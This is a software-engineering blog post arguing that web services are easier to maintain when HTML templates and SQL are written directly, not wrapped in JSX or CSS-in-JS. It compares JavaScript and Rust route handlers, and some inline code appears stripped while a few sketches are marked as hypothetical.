Unplanned Obsolescence is a blog about writing maintainable, long-lasting software. It also frequently touts—or is, at the very least, not inherently hostile to—writing software in dynamically-typed programming languages. These two positions are somewhat at odds. Dynamically-typed languages encode less information. That’s a problem for the person reading the code and trying to figure out what it does. This is a simplified version of an authentication middleware that I include in most of my web services: it checks an HTTP request to see if it corresponds to a logged-in user’s session. Pretty straightforward stuff. The function gets a cookie from the HTTP request, checks the database to see if that token corresponds to a user, and then returns the user if it does. Line 2 fetches the cookie from the request, line 3 gets the user from the database, and the rest either returns the user or throws an error. There are, however, some problems with this. What happens if there’s no cookie included in the HTTP request? Will it return or an empty string? Will even exist if there’s no cookies at all? There’s no way to know without looking at the implementation (or, less reliably, the documentation). That doesn’t mean there isn’t an answer! A request with no cookie will return . That results in a call, which returns (the function checks for that). is a falsy value in JavaScript, so the conditional evaluates to false and throws an . The code works and it’s very readable, but you have to do a fair amount of digging to ensure that it works reliably. That’s a cost that gets paid in the future, anytime the “missing token” code path needs to be understood or modified. That cost reduces the maintainability of the service. Unsurprisingly, the equivalent Rust code is much more explicit. In Rust, the tooling can answer a lot more questions for me. What type is ? A simple hover in any code editor with an LSP tells me, definitively, that it’s .
Because it’s Rust, you have to explicitly check if the token exists; ditto for whether the user exists. That’s better for the reader too: they don’t have to wonder whether certain edge cases are handled.

Rust is not the only language with strict, static typing. At every place I’ve ever worked, the longest-running web services have all been written in Java. Java is not as good as Rust at forcing you to show your work and handle edge cases, but it’s much better than JavaScript. Putting aside the question of which one I prefer to write, if I find myself in charge of a production web service that someone else wrote, I would much prefer it to be in Java or Rust than JavaScript or Python.

Conceding that, ceteris paribus , static typing is good for software maintainability, one of the reasons that I like dynamically-typed languages is that they encourage a style I find important for web services in particular: writing to the DSL.

A DSL (domain-specific language) is a programming language that’s designed for a specific problem area. This is in contrast to what we typically call “general-purpose programming languages” (e.g. Java, JavaScript, Python, Rust), which can reasonably be applied to most programming tasks. Most web services have to contend with at least three DSLs: HTML, CSS, and SQL. A web service with a JavaScript backend has to interface with, at a minimum, four programming languages: one general-purpose and three DSLs. If you have the audacity to use something other than JavaScript on the server, then that number goes up to five, because you still need JavaScript to augment HTML.

That’s a lot of languages! How are we supposed to find developers who can do all this stuff? The answer that a big chunk of the industry settled on is to build APIs so that the domains of the DSLs can be described in the general-purpose programming language. Instead of writing HTML directly, you can write JSX, a JavaScript syntax extension that supports HTML-like tags.
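For instance (a hypothetical component, not the post’s actual example; JSX needs a build step to run):

```jsx
// Plain HTML would be: <ul><li>alice</li><li>bob</li></ul>
// JSX expresses the same markup as a JavaScript expression:
function UserList({ users }) {
  return (
    <ul>
      {users.map((user) => (
        <li key={user.id}>{user.name}</li>
      ))}
    </ul>
  );
}
```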
This has the important advantage of allowing you to include dynamic JavaScript expressions in your markup. And now we don’t have to kick out to another DSL to write web pages. Can we start abstracting away CSS too? Sure can! This example uses styled-components .

This is a tactic I call “expanding the bounds” of the programming language. In an effort to reduce complexity, you try to make one language express everything about the project. In theory, this reduces the number of languages that one needs to learn to work on it.

The problem is that it usually doesn’t work. Expressing DSLs in general-purpose programming syntax does not free you from having to understand the DSL—you can’t actually use styled-components without understanding CSS. So now a prospective developer has to both understand CSS and a new CSS syntax that only applies to the styled-components library. Not to mention, it is almost always a worse syntax. CSS is designed to make expressing declarative styles very easy, because that’s the only thing CSS has to do. Expressing this in JavaScript is naturally way clunkier.

Plus, you’ve also tossed the web’s backwards compatibility guarantees. I picked styled-components because it’s very popular. If you built a website with styled-components in 2019 , didn’t think about the styles for a couple years, and then tried to upgrade it in 2023 , you would be two major versions behind. Good luck with the migration guide . CSS files, on the other hand, are evergreen .

Of course, one of the reasons for introducing JSX or CSS-in-JS is that they add functionality, like dynamic population of values. That’s an important problem, but I prefer a different solution. Instead of expanding the bounds of the general-purpose language so that it can express everything, another strategy is to build strong and simple API boundaries between the DSLs. Some benefits of this approach include:

- DSLs are better at expressing their domain, resulting in simpler code
- It aids debugging by segmenting bugs into natural categories
- The skills gained by writing DSLs are more transferable

The following example uses a JavaScript backend.
A lot of enthusiasm for htmx (the software library I co-maintain) is driven by communities like Django and Spring Boot developers, who are thrilled to no longer be bolting on a JavaScript frontend to their website; that’s a core value proposition for hypermedia-driven development . I happen to like JavaScript though, and sometimes write services in NodeJS, so, at least in theory, I could still use JSX if I wanted to. What I prefer, and what I encourage hypermedia-curious NodeJS developers to do, is use a template engine .

This bit of production code I wrote for an events company uses Nunjucks , a template engine I once (fondly!) called “abandonware” on stage . Other libraries that support Jinja -like syntax are available in pretty much any programming language. This is just HTML with basic loops ( `{% for %}` ) and data access ( `{{ }}` ). I get very frustrated when something that is easy in HTML is hard to do because I’m using some wrapper with inferior semantics; with templates, I can dynamically build content for HTML without abstracting it away.

Populating this template in JavaScript is so easy . You just give it a JavaScript object with the corresponding field. That’s not particularly special on its own—many languages support serialized key-value pairs. This strategy really shines when you start stringing it together with SQL. Let’s replace that database function call with an actual query, using a typical synchronous SQLite interface.

I know the above code is not everybody’s taste, but I think it’s marvelous. You get to write all parts of the application in the language best suited to each: HTML for the frontend and SQL for the queries. And if you need to do any additional logic between the database and the template, JavaScript is still right there. One result of this style is that it increases the percentage of your service that is specified declaratively. The database schema and query are declarative, as is the HTML template.
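Strung together, the whole route might look something like this sketch. The better-sqlite3-style `db`, the `render` stand-in for a template engine, and the `events` table are all my assumptions, not the post’s actual code:

```javascript
// Hypothetical stand-ins for the real pieces: a better-sqlite3-style
// prepared statement and a template engine's render function.
const db = {
  prepare: (sql) => ({
    all: () => [{ name: "Launch Party", date: "2025-06-01" }],
  }),
};

const render = (template, data) =>
  // A real engine would load `template` from disk; this fakes the
  // {% for event in events %} loop from a Nunjucks-style template.
  data.events.map((e) => `<li>${e.name} - ${e.date}</li>`).join("\n");

// The whole route: one declarative SQL query, one declarative template,
// and two statements of imperative glue between them.
function getEvents(req, res) {
  const events = db.prepare("SELECT name, date FROM events").all();
  return render("events.njk", { events });
}
```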
The only imperative code in the function is the glue that moves that query result into the template: two statements in total. Debugging is also dramatically easier. I typically do two quick things to narrow down the location of the bug:

- CMD+U to View Source. If the missing data is in the HTML, it’s a frontend problem.
- Run the query in the database. If the missing data is in the SQL, it’s a problem with the GET route.

Those two steps are easy, can be done in production with no deployments, and provide excellent signal on the location of the error. Fundamentally, what’s happening here is a quick check at the two hard boundaries of the system: the one between the server and the client, and the one between the client and the database.

Similar tools are available to you if you abstract over those layers, but they are less useful. Every web service has network requests that can be inspected, but putting most frontend logic in the template means that the HTTP response’s data (“does the date ever get sent to the frontend?”) and functionality (“does the date get displayed in the right HTML element?”) can be inspected in one place, with one keystroke. Every database can be queried, but using the database’s native query language in your server means you can validate both the stored data (“did the value get saved?”) and the query (“does the code ask for the right value?”) independent of the application.

By pushing so much of the business logic outside the general-purpose programming language, you reduce the likelihood that a bug will exist in the place where it is hardest to track down—runtime server logic. You’d rather the bug be a malformatted SQL query or HTML template, because those are easy to find and easy to fix. When combined with the router-driven style described in Building The Hundred-Year Web Service , you get simple and debuggable web systems. Each HTTP request is a relatively isolated function call: it takes some parameters, runs an SQL query, and returns some HTML.
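The next paragraphs walk through a Rust equivalent of that route. As a point of reference, here is an illustrative, uncompiled sketch of what a rusqlite + minijinja handler might look like; the struct, field names, and template name are my assumptions, not the post’s actual code:

```rust
// Illustrative sketch only (not compiled): rusqlite + minijinja usage
// reconstructed from the surrounding description.
#[derive(serde::Serialize)]
struct Event {
    name: String,
    date: String, // nothing checks this against the actual column type
}

fn get_events(
    db: &rusqlite::Connection,
    env: &minijinja::Environment,
) -> Result<String, Box<dyn std::error::Error>> {
    let mut stmt = db.prepare("SELECT name, date FROM events")?;
    let events: Vec<Event> = stmt
        .query_map([], |row| {
            Ok(Event { name: row.get(0)?, date: row.get(1)? })
        })?
        .collect::<Result<_, _>>()?;
    Ok(env.get_template("events.html")?.render(minijinja::context! { events })?)
}
```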
In essence, dynamically-typed languages help you write the least amount of server code possible, leaning heavily on the DSLs that define web programming while validating small amounts of server code via means other than static type checking.

To finish, let’s take a look at the equivalent code in Rust, using rusqlite , minijinja , and a quasi-hypothetical server implementation. I am again obfuscating some implementation details (Are we storing human-readable dates in the database? What’s that universal result type?). The important part is that this blows. Most of the complexity comes from the need to tell Rust exactly how to unpack that SQL result into a typed data structure, and then into an HTML template. The struct is declared so that Rust knows to expect a String for the date. The derive macros create a representation that minijinja knows how to serialize. It’s tedious.

Worse, after all that work, the compiler still doesn’t do the most useful thing: check whether String is actually the correct type for the date column. If it turns out that the date can’t be represented as a String (maybe it’s a blob ), the query will compile correctly and then fail at runtime. From a safety standpoint, we’re not really in a much better spot than we were with JavaScript: we don’t know if it works until we run the code.

Speaking of JavaScript, remember that code? That was great! Now we have no idea what any of these types are, but if we run the code and we see some output, it’s probably fine. By writing the JavaScript version, you are banking that you’ve made the code so highly auditable by hand that the compile-time checks become less necessary. In the long run, this is always a bad bet, but at least I’m not writing 150% more code for 10% more compile-time safety.

The “expand the bounds” solution to this is to pull everything into the language’s type system: the database schema, the template engine, everything. Many have trod that path; I believe it leads to madness (and toolchain lock-in). Is there a better one? I believe there is.
The compiler should understand the DSLs I’m writing and automatically map them to types it understands. If it needs more information—like a database schema—to figure that out, that information can be provided. Queries correspond to columns with known types—the programming language can infer the type of each selected column. HTML has context-dependent escaping rules —the programming language can validate that an interpolated value is being used in a valid element and escape it correctly. With this functionality in the compiler, if I make a database migration that would render my usage of a dependent variable in my HTML template invalid, the compiler will show an error. All without losing the advantages of writing the expressive, interoperable, and backwards-compatible DSLs that comprise web development.

Dynamically-typed languages show us how easy web development can be when we ditch the unnecessary abstractions. Now we need tooling to make it just as easy in statically-typed languages too.

Thanks to Meghan Denny for her feedback on a draft of this blog.

Language extensions that just translate the syntax are alright by me, like generating HTML with s-expressions , ocaml functions , or zig comptime functions . I tend to end up just using templates, but language-native HTML syntax can be done tastefully, and they are probably helpful in the road to achieving the DX I’m describing; I’ve never seen them done well for SQL. Sqlx and sqlc seem to have the right idea, but I haven’t used either because I prefer to stick to SQLite-specific libraries to avoid async database calls.
I don’t know as much about compilers as I’d like to, so I have no idea what kind of infrastructure would be required to make this work with existing languages in an extensible way. I assume it would be hard.
